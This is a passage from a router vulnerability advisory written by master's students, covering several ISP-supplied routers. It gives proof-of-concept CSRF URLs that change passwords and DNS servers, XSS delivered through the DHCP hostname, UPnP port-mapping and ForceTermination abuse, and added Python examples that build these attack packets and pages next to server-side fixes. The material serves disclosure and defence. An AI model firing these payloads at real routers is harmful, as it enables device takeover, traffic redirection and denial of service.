An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the Dispositivos Conectados (Connected Devices)   
table.  
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router   
needs to be factory reset to work properly again) or open critical ports, even for remote   
hosts which are not in the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Astoria  
Model: ARV7510  
Tested firmwares: 00.03.41  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121773 (http://osvdb.org/show/osvdb/121773)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP address on port 9000.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and  
OSVDB-121888 (http://osvdb.org/show/osvdb/121888)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
E.g., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Amper  
Model: ASL-26555  
Tested firmwares: v2.0.0.37B_ES  
Comments: Common router that Spanish ISP Telefónica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and  
OSVDB-121771 (http://osvdb.org/show/osvdb/121771)  
  
* PoC:  
Besides the main web configuration interface (port 80), there is a much more advanced one   
on port 8000 in which every input field is vulnerable to CSRF.  
  
E.g., if an attacker wants to change the DNS servers, he may use the following URL to do   
so once the victim opens the link:   
http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS  
  
It is also possible for an attacker to change the default router administrator password by   
sending the victim a similar URL (the URL is omitted for size reasons).  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121772 (http://osvdb.org/show/osvdb/121772)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which an XSS can be performed.  
  
E.g., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name)   
subdirectory allows script code injection. The vulnerable input field is found in the   
basic web interface on port 80.  
  
The script execution can be clearly seen within the Advanced->WLAN Access Rules subdirectory,   
into the advanced web interface on port 8000.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the Connected Clients table (Setup->Local Network).  
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router   
needs to be factory reset to work properly again) or open critical ports, even for remote   
hosts which are not in the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: AR-5387un  
Tested firmwares: A731-410JAZ-C04_R02  
Comments: Common router that ISP Jazztel used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which an XSS can be performed.  
  
E.g., the SSID field within the Wireless->Basic subdirectory allows script code injection.  
  
The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter   
subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP).  
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Netgear  
Model: CG3100D  
Tested firmwares: v1.05.05  
Comments: Common router that ISP ONO used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121795 (http://osvdb.org/show/osvdb/121795)  
  
* PoC:  
Every configuration form on the router website accepts forged requests: no anti-CSRF  
token is required and the origin of the request is not checked.  
  
An attacker can host a web page that issues a POST request to the victim's router. When  
the victim visits that page, the browser sends the request together with the victim's  
router session and the change is applied.  
  
The same technique lets an attacker reset the victim's router to its default settings.  
  
(The proof-of-concept source code has been omitted for reasons of size.)  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for CVE assignment.  
OSVDB-121780 (http://osvdb.org/show/osvdb/121780)  
  
* PoC:  
Although most input fields reject special characters, some still allow an XSS payload to  
be stored.  
  
For example, the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name)  
subdirectory allows script code injection.  
  
The script execution can be clearly seen within different subdirectories such as   
Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del   
router (Advanced->Router status).  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: VG-8050  
Tested firmwares: SB01-S412TLF-C07_R03   
Comments: Common router that Spanish ISP Telefonica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for CVE assignment.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Although most input fields reject special characters, some still allow an XSS payload to  
be stored.  
  
For example, the SSID field within the Wireless->Basic subdirectory allows script code  
injection.  
  
The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter   
subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for CVE assignment.  
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)  
  
* PoC:  
An attacker on any network segment served by the router's DHCP server is able to inject  
malicious code into the router website without going through any login process.  
This is achieved by sending a DHCP Request PDU whose Host Name option (DHCP option 12)  
contains the malicious script.  
  
The payload is stored in the DHCP Leases table (Device Info -> DHCP) and executes as soon  
as an administrator views that page.  
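The exchange described in both Unauthenticated Cross Site Scripting findings above, as an  
added example that is not part of the original advisory: the script builds a DHCPREQUEST  
whose Host Name option (option 12) carries an HTML payload, extracts the hostname the way a  
DHCP server would before writing its lease table, and renders the lease row both raw (the  
behaviour reported here) and HTML-encoded (the fix). The MAC address, IP addresses and  
payload are constructed sample values; send_broadcast() is only for use against a router  
you are authorised to test and needs root (or CAP_NET_BIND_SERVICE) to bind UDP port 68.

```python
"""Added example (not from the advisory): a DHCPREQUEST whose Host Name option
carries an HTML payload, the lease-table rendering that makes it execute, and
the output encoding that does not. All addresses are constructed sample values."""
import html
import socket
import struct

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_HOSTNAME, OPT_REQ_IP, OPT_MSG_TYPE, OPT_END = 12, 50, 53, 255
DHCPREQUEST = 3


def build_dhcp_request(mac: bytes, hostname: str, requested_ip: str,
                       xid: int = 0x3903F326) -> bytes:
    """Minimal RFC 2131 DHCPREQUEST; option 12 (Host Name) is attacker-controlled."""
    if len(mac) != 6:
        raise ValueError("MAC address must be 6 bytes")
    name = hostname.encode("utf-8")
    if len(name) > 255:
        raise ValueError("a single DHCP option carries at most 255 bytes")
    fixed = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        1, 1, 6, 0,                   # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops=0
        xid, 0, 0x8000,               # transaction id, secs, flags: broadcast reply
        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,     # ciaddr, yiaddr, siaddr, giaddr
        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128,  # chaddr, sname, file
    )
    options = (
        bytes([OPT_MSG_TYPE, 1, DHCPREQUEST])
        + bytes([OPT_REQ_IP, 4]) + socket.inet_aton(requested_ip)
        + bytes([OPT_HOSTNAME, len(name)]) + name
        + bytes([OPT_END])
    )
    return fixed + DHCP_MAGIC_COOKIE + options


def parse_dhcp_options(packet: bytes) -> dict:
    """Return {code: raw value} for the options of a DHCP packet, i.e. what the
    router's DHCP server extracts before it writes the lease table."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(packet) and packet[i] != OPT_END:
        code = packet[i]
        if code == 0:                 # PAD option has no length byte
            i += 1
            continue
        length = packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def render_lease_row(hostname: str, ip: str, mac: str, escape: bool) -> str:
    """One row of a 'Device Info -> DHCP' lease table. escape=False reproduces the
    reported behaviour (hostname interpolated raw); escape=True encodes it on output."""
    shown = html.escape(hostname, quote=True) if escape else hostname
    return f"<tr><td>{shown}</td><td>{ip}</td><td>{mac}</td></tr>"


def send_broadcast(packet: bytes) -> None:
    """Deliver the request to the local DHCP server (binding port 68 needs root)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.bind(("", 68))
        s.sendto(packet, ("255.255.255.255", 67))


def demo(payload: str = "<script>alert(document.cookie)</script>") -> tuple:
    """Round-trip the payload through the packet and render both table variants."""
    pkt = build_dhcp_request(bytes.fromhex("001122334455"), payload, "192.168.1.100")
    name = parse_dhcp_options(pkt)[OPT_HOSTNAME].decode("utf-8", "replace")
    unsafe = render_lease_row(name, "192.168.1.100", "00:11:22:33:44:55", escape=False)
    safe = render_lease_row(name, "192.168.1.100", "00:11:22:33:44:55", escape=True)
    return pkt, name, unsafe, safe


if __name__ == "__main__":
    _, name, unsafe, safe = demo()
    print("stored hostname:", name)
    print("vulnerable row: ", unsafe)
    print("encoded row:    ", safe)
```

The encoded row is where the fix belongs: many DHCP servers store whatever bytes arrive in  
option 12, and a 255-byte option is more than enough for an external script include, so  
the web interface has to encode the hostname when it renders the lease table rather than  
rely on the DHCP server to filter it.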
============================================================================================  
  
  
============================================================================================  
Manufacturer: Zyxel  
Model: P 660HW-B1A  
Tested firmwares: 3.10L.02  
Comments: Common router that Spanish ISP Telefonica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for CVE assignment.  
OSVDB-121796 (http://osvdb.org/show/osvdb/121796)  
  
* PoC:  
Although most input fields reject special characters, some still allow an XSS payload to  
be stored.  
  
For example, the Hostname field within the Dynamic DNS subdirectory allows script code  
injection.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for CVE assignment.  
OSVDB-121797 (http://osvdb.org/show/osvdb/121797)  
  
* PoC:  
Every configuration form on the router website is vulnerable to Cross Site Request Forgery.  
  
For example, the administrator password is changed by a plain GET request carrying no  
anti-CSRF token, so an attacker only needs the victim to open the following link:  
http://192.168.1.1/password.cgi?sysPassword=newpassword  
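An added example covering the Cross Site Request Forgery findings for both the Netgear  
CG3100D and this Zyxel device; it is not the source code the authors omitted. The first  
function produces the attacker page that makes a visitor's browser issue the GET above; the  
rest implements the checks the routers lack (state changes only by POST, an Origin/Referer  
check and a per-session synchronizer token). The router URL is the one from the advisory;  
the field name csrf_token, the session id and the secret are illustrative assumptions.

```python
"""Added example (not the advisory's omitted source): the attacker page that
forges the password change, and the server-side checks that would reject it.
Router origin is the advisory's; csrf_token, session id and secret are assumptions."""
import hmac
import secrets
from urllib.parse import parse_qs, quote, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"


def csrf_poc_page(new_password: str) -> str:
    """Attacker-hosted HTML. A zero-size <img> makes the victim's browser issue the
    GET from the advisory; the browser adds the victim's router session (cookie or
    cached HTTP Basic credentials) by itself, so the attacker needs no login."""
    url = f"{ROUTER_ORIGIN}/password.cgi?sysPassword={quote(new_password, safe='')}"
    return f'<html><body><img src="{url}" width="0" height="0" alt=""></body></html>'


def issue_token(session_id: str, secret: bytes) -> str:
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session_id).
    The router would embed it as a hidden field in every configuration form."""
    return hmac.new(secret, session_id.encode(), "sha256").hexdigest()


def request_allowed(method: str, headers: dict, form_body: str,
                    session_id: str, secret: bytes) -> tuple:
    """Decide whether a state-changing request may be honoured.
    1. State changes only via POST: a GET such as password.cgi?sysPassword=... is
       forgeable by a plain link or image tag.
    2. The Origin header (Referer as fallback) must name the router's own origin.
    3. The form must carry the session's csrf_token, compared in constant time."""
    if method.upper() != "POST":
        return False, "state change via GET"
    hdrs = {k.lower(): v for k, v in headers.items()}
    origin = hdrs.get("origin")
    if origin is None and "referer" in hdrs:
        ref = urlsplit(hdrs["referer"])
        origin = f"{ref.scheme}://{ref.netloc}"
    if origin != ROUTER_ORIGIN:
        return False, f"request origin {origin!r} is not the router"
    token = parse_qs(form_body).get("csrf_token", [""])[0]
    if not hmac.compare_digest(token, issue_token(session_id, secret)):
        return False, "missing or invalid csrf_token"
    return True, "ok"


if __name__ == "__main__":
    secret, sid = secrets.token_bytes(32), "session-123"
    print(csrf_poc_page("newpassword"))
    # Forged request from the attacker's page: wrong origin, no token.
    print(request_allowed("POST", {"Origin": "http://attacker.example"},
                          "sysPassword=newpassword", sid, secret))
    # Legitimate request submitted from the router's own form.
    print(request_allowed("POST", {"Origin": ROUTER_ORIGIN},
                          f"sysPassword=newpassword&csrf_token={issue_token(sid, secret)}",
                          sid, secret))
```

The token is the primary control; the Origin/Referer check is defence in depth, because  
privacy settings can strip Referer, and a request that carries neither header is rejected  
here as the conservative choice. The image-tag variant works against these routers because  
the browser attaches cached HTTP Basic credentials as readily as a session cookie, so a  
one-time login prompt offers no protection.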
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: 536+  
Tested firmwares: A101-220TLF-C35  
Comments: Common router that Spanish ISP Telefonica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for CVE assignment.  
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)  
  
* PoC:  
The device supports the Universal Plug and Play (UPnP) protocol. The protocol has  
well-known weaknesses, chiefly the absence of any authentication, which attackers can  
exploit.  
  
The device exposes several UPnP actions, including the modification of firewall rules  
(AddPortMapping) and the termination of any WAN connection (ForceTermination).  
  
These actions allow an attacker to cause a persistent denial of service (the router has  
to be factory reset before it works properly again) or to open critical ports, even for  
remote hosts that are not in the LAN.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: D-Link  
Model: DIR-600  
Tested firmwares: PV6K3A8024009  
Comments:   
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for CVE assignment.  
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. The  
protocol has well-known weaknesses, chiefly the absence of any authentication, which  
attackers can exploit.  
  
The device exposes several UPnP actions, including the modification of firewall rules  
(AddPortMapping) and the termination of any WAN connection (ForceTermination).  
  
These actions allow an attacker to cause a persistent denial of service (the router has  
to be factory reset before it works properly again) or to open critical ports, even for  
remote hosts that are not in the LAN.  
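An added example, not from the advisory, covering the Universal Plug and Play findings for  
both the Comtrend 536+ and this D-Link DIR-600: it builds the SOAP requests for the two  
WANIPConnection:1 actions named above (AddPortMapping and ForceTermination), parses them  
back the way the device would, and applies the checks a hardened Internet Gateway Device  
should make before honouring them. The control URL /upnp/control/WANIPConn1, TCP port 5000  
and all addresses are assumptions; on a real device the control URL is read from the  
description XML that the LOCATION header of its SSDP reply points to.

```python
"""Added example (not from the advisory): SOAP requests for the UPnP IGD actions
AddPortMapping and ForceTermination, and the source/argument policy the affected
devices lack. Control URL, port and addresses are constructed assumptions."""
import ipaddress
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# Actions an unauthenticated LAN client may reach; ForceTermination is deliberately absent.
ALLOWED_ACTIONS = {"GetExternalIPAddress", "GetStatusInfo",
                   "GetSpecificPortMappingEntry", "AddPortMapping"}


def soap_request(host: str, control_url: str, action: str, args: dict) -> str:
    """Full HTTP/1.1 request for one UPnP action. The protocol carries no credential:
    whoever can reach the control URL can invoke the action."""
    params = "".join(f"<{k}>{escape(v)}</{k}>" for k, v in args.items())
    body = (
        '<?xml version="1.0"?>'
        f'<s:Envelope xmlns:s="{SOAP_NS}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{SERVICE}">{params}</u:{action}></s:Body>'
        '</s:Envelope>'
    )
    return (
        f"POST {control_url} HTTP/1.1\r\n"
        f"HOST: {host}\r\n"
        'CONTENT-TYPE: text/xml; charset="utf-8"\r\n'
        f"CONTENT-LENGTH: {len(body.encode())}\r\n"
        f'SOAPACTION: "{SERVICE}#{action}"\r\n\r\n'
        f"{body}"
    )


def add_port_mapping_args(external_port: int, protocol: str, internal_client: str,
                          internal_port: int, description: str,
                          lease_seconds: int = 0, remote_host: str = "") -> dict:
    """Argument set of WANIPConnection:1 AddPortMapping, in the order the spec lists them."""
    return {
        "NewRemoteHost": remote_host,            # empty = any source on the WAN
        "NewExternalPort": str(external_port),
        "NewProtocol": protocol,
        "NewInternalPort": str(internal_port),
        "NewInternalClient": internal_client,    # the host inbound traffic is sent to
        "NewEnabled": "1",
        "NewPortMappingDescription": description,
        "NewLeaseDuration": str(lease_seconds),  # 0 = permanent mapping
    }


def parse_soap_action(http_request: str) -> tuple:
    """Recover (action, args) from a request built above, as the device would see it."""
    body = http_request.split("\r\n\r\n", 1)[1]
    action_el = list(ET.fromstring(body).find(f"{{{SOAP_NS}}}Body"))[0]
    action = action_el.tag.split("}", 1)[1]
    return action, {child.tag: (child.text or "") for child in action_el}


def igd_should_accept(src_ip: str, action: str, args: dict, lan_cidr: str,
                      secure_mode: bool = True) -> tuple:
    """Policy modelled on miniupnpd's secure_mode, which the affected devices lack:
    - honour requests only from the LAN side;
    - expose only a small allowlist of actions (no ForceTermination);
    - AddPortMapping may target only a LAN address and, in secure mode, only the
      requesting host, so a client cannot expose another host or a WAN address."""
    lan = ipaddress.ip_network(lan_cidr)
    if ipaddress.ip_address(src_ip) not in lan:
        return False, "request did not come from the LAN"
    if action not in ALLOWED_ACTIONS:
        return False, f"action {action} not permitted for unauthenticated clients"
    if action != "AddPortMapping":
        return True, "ok"
    try:
        target = ipaddress.ip_address(args.get("NewInternalClient", ""))
    except ValueError:
        return False, "NewInternalClient is not an IP address"
    if target not in lan:
        return False, "NewInternalClient is outside the LAN"
    if secure_mode and str(target) != src_ip:
        return False, "client may only map ports to itself"
    return True, "ok"


if __name__ == "__main__":
    args = add_port_mapping_args(2222, "TCP", "192.168.1.50", 22, "ssh")
    req = soap_request("192.168.1.1:5000", "/upnp/control/WANIPConn1", "AddPortMapping", args)
    print(req)
    print(igd_should_accept("192.168.1.50", *parse_soap_action(req), "192.168.1.0/24"))
    dos = soap_request("192.168.1.1:5000", "/upnp/control/WANIPConn1", "ForceTermination", {})
    print(igd_should_accept("192.168.1.50", *parse_soap_action(dos), "192.168.1.0/24"))
```

Neither request carries any credential, which is the root of the finding: a device without  
the checks above honours an AddPortMapping whose NewInternalClient is a WAN address (the  
"remote hosts that are not in the LAN" case) and a permanent mapping (NewLeaseDuration 0)  
just as readily as a ForceTermination from any host that can reach the control URL.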
============================================================================================  
  
  
We would also like to thank Alejandro Ramos (Project Tutor) and Maite Villalba (Director of Master).  
  
Greetings,  
Jose Antonio Rodriguez Garcia  
Alvaro Folgado Rueda  
Ivan Sanz de Castro.  